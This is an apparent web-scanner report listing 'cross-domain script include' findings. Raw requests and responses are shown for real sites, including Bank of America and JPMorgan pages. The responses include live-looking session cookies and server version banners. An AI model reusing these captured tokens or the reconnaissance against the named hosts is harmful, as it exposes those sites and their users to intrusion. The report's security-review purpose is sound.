button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Chelsea FC - Exclusive Torres Interview" data-thumb="//i3.ytimg.com/vi/bHlm_Vk5aBQ/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/17');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="The GOOSE Whisperer" data-thumb="//i1.ytimg.com/vi/xsnuBwYJUoo/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/26');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Ultimate Caption FAIL, FAIL" data-thumb="//i1.ytimg.com/vi/hVNrkXM3TTI/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/28');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="ASCENSION NAZI ZOMBIE GAMEPLAY" data-thumb="//i1.ytimg.com/vi/P7uuZx-oeDg/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/29');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="I DID HIM" data-thumb="//i1.ytimg.com/vi/87xLrWV6pFs/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmp');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Imagination Is Everything" data-thumb="//i3.ytimg.com/vi/vrulLtPTcjw/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmf');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<a class="large-thumb" title="Misfits" href="/watch?v=xMABaMyZOrc&amp;feature=fvhr">
<img src="http://i1.ytimg.com/vi/xMABaMyZOrc/hqdefault.jpg" alt="Misfits">
</a>
...[SNIP]...
<span class="watch-video-label">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
Watch this video
</span>
...[SNIP]...
<span class="promoted-label">
<a href="http://www.google.com/support/youtube/bin/answer.py?hl=en&answer=143421">Featured Video</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/EAc4zHEDd7o/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/B5uHegwQvyM/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/qMxX-QOV9tI/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/2_XxzygtROM/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/A5opKKMsuj0/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/esMIVBJkTgs/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<h3><a href="http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html">Subscription Widget</a>
...[SNIP]...
<h3>
<a href="http://youtubeukblog.blogspot.com/">Share and share alike: we...ve acquired Fflick</a>
...[SNIP]...
<p class="alignR">
<a href="http://youtubeukblog.blogspot.com/">Read more in our Blog</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/youtube/overview.html">Developers</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/static.py?p=homepage&amp;page=start.cs&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Help');">Help</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Safety');">Safety</a>
...[SNIP]...
</span>

<a href="http://www.google.com/tools/feedback/intl/en/error.html" onclick="return yt.www.feedback.start('en', {&quot;accept_language&quot;: &quot;en&quot;});" id="reportbug">Report a bug</a>
...[SNIP]...
<div id="quicklist-player-close"><img onclick="yt.www.navigation.expandPlayer();" class="master-sprite expand-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"><img onclick="yt.www.navigation.closePlayer();" class="master-sprite close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"></div>
...[SNIP]...
<div id="quicklist-notifications" style="display: none;" class="yt-alert yt-alert-success yt-alert-small yt-alert-naked yt-rounded">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">

<div class="yt-alert-content">
...[SNIP]...
pe="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked start start-edge yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Previous video" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-prev" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end yt-uix-button" onclick=";return false;" id="quicklist-next-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-next" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
ist-play-button" type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Play videos" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
</span> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div style="display:none;" class="yt-uix-button-menu">
...[SNIP]...
aster-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-autoplay-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-autoplay" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
master-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-shuffle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-shuffle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end end-edge yt-uix-button" onclick=";return false;" id="quicklist-toggle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-toggle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
<button class="yt-uix-button quicklist-tray-button yt-uix-slider-prev" onclick="return false;"><img class="yt-uix-slider-prev-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Previous"></button><button class="yt-uix-button quicklist-tray-button yt-uix-slider-next" onclick="return false;"><img class="yt-uix-slider-next-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Next"></button>
...[SNIP]...
<li class="empty quicklist-help-message">Your queue is empty. Add videos to your queue using this button: <img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="addto-button-help"><br> or <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;hl=en_US&amp;ltmpl=sso">sign in</a>
...[SNIP]...
<div id="quicklist-loading"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Loading..."><span id="quicklist-loading-message">
...[SNIP]...
<span class="yt-uix-button-menu-item " onclick="">
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;hl=en_US&amp;ltmpl=sso">Sign in</a>
...[SNIP]...

17. Cross-domain script include  previous  next
There are 195 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


17.1. http://ahead.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: ahead.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:01:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-eq
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/Influencers3/css/video-js.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d828709/2/829629/randm.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d828709/3/829630/randm.js"></script>
...[SNIP]...

17.2. http://ahead.bankofamerica.com/quarterly-impact-report-3rd-quarter-2010/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /quarterly-impact-report-3rd-quarter-2010/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quarterly-impact-report-3rd-quarter-2010/ HTTP/1.1
Host: ahead.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:01:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-eq
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/Influencers3/css/video-js.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d828709/2/829629/randm.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d828709/3/829630/randm.js"></script>
...[SNIP]...

17.3. http://asert.arbornetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asert.arbornetworks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: asert.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:16 GMT
Server: Apache/2.2.17 (Unix) DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
X-Pingback: http://asert.arbornetworks.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</a><script type="text/javascript" src="http://embed.technorati.com/embed/75643vkmq.js"></script>
...[SNIP]...

17.4. http://brandonaaron.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brandonaaron.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: brandonaaron.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:39 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.0.6
X-Runtime: 1ms
ETag: "a4ce40465459161f1ce43721df143003"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _blog_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--43c046f6acf84405a38de8e12fc2c472b1d35a90; path=/; HttpOnly
Content-Length: 19341
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>Brandon Aaron : Blog</title>
<meta content='text/html; charset=utf-8' http-equiv='Content-type' />
<link href='/favicon.ico' rel='shortcut icon' />

...[SNIP]...
</script>
<script src='http://i.simpli.fi/dpx.js?cid=107' type='text/javascript'></script>
...[SNIP]...

17.5. http://careers.jpmorganchase.com/career/careerhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://careers.jpmorganchase.com
Path:   /career/careerhome

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career/careerhome HTTP/1.1
Host: careers.jpmorganchase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:20 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
Set-Cookie: JpmcSession=TzkVNJxJQrS0gzJv15V8Vrx2QzN9B6kLwsGv8cCv6MNQVGfj6sk1!-872331758; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


                                                           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<link href="../CSS/code/white4.css" re
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.jpmorgan.com/emetrics/s_code.js"></script>
...[SNIP]...

17.6. http://cnews.canoe.ca/CNEWS/Environment/Suzuki/2011/01/18/16940341.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cnews.canoe.ca
Path:   /CNEWS/Environment/Suzuki/2011/01/18/16940341.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CNEWS/Environment/Suzuki/2011/01/18/16940341.html HTTP/1.1
Host: cnews.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=180
Expires: Thu, 03 Feb 2011 00:11:32 GMT
Vary: Accept-Encoding
ServerID: portailen-prod-fe-02
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 46866
Date: Thu, 03 Feb 2011 00:08:32 GMT
X-Varnish: 4094163999
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<html>
<head>
<title>Is there a cure for the bluefin blues? - Environment - Canoe.ca</title>
<META HTTP-EQUIV="Reply-to" CONTENT="&#110;&#101;&#119;&#115;&#95;&#101;&#100;&#64;&#99;&#97;&#110;&#111
...[SNIP]...
News, Jokes, Humor, Strange News, Oddities, Features, Canadian Photos, Provincial Photos, Regional Photos, Latest Photos, International Photos, American Photos, Crime, Law, Justice, Court, Police">

<script type="text/javascript" src="http://www.canoe.ca/Canoe/scripts/jquery-1.3.2.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://static.search.canoe.ca/s-toile/img/js/network_searchbar/network_searchbar_en.js"></script>
...[SNIP]...
<FORM name="guidecanoe" style="margin:0; padding:0; display:inline;"><SCRIPT LANGUAGE="JavaScript1.2" SRC="http://www.canoe.ca/Canoe/Includes/options.js"></SCRIPT>
...[SNIP]...
<div id=xsmtext><SCRIPT LANGUAGE="JavaScript" src="http://scripts.canoe.ca/sondage/js/sondage.js"></SCRIPT>
...[SNIP]...
</a>
           <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<td width=780 colspan=3 bgcolor="#ffffff" align=center><SCRIPT LANGUAGE="JavaScript1.2" SRC="http://www.canoe.ca/Canoe/Includes/copyright.js"></SCRIPT>
...[SNIP]...
<!-- pubdate 20110118 /pubdate -->
<script language="JavaScript" src="http://www.canoe.ca/CanoeIncludes/tophits/js/tophits_canoe_CNEWS.js"></script>
...[SNIP]...

17.7. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:09:55 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cf365c01c96c83f0:TM=1296684601:LM=1296684601:S=fZz2qgvUxhAStUQx; expires=Fri, 01-Feb-2013 22:10:01 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...
</table>
<script src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js"></script>
...[SNIP]...

17.8. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:08:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
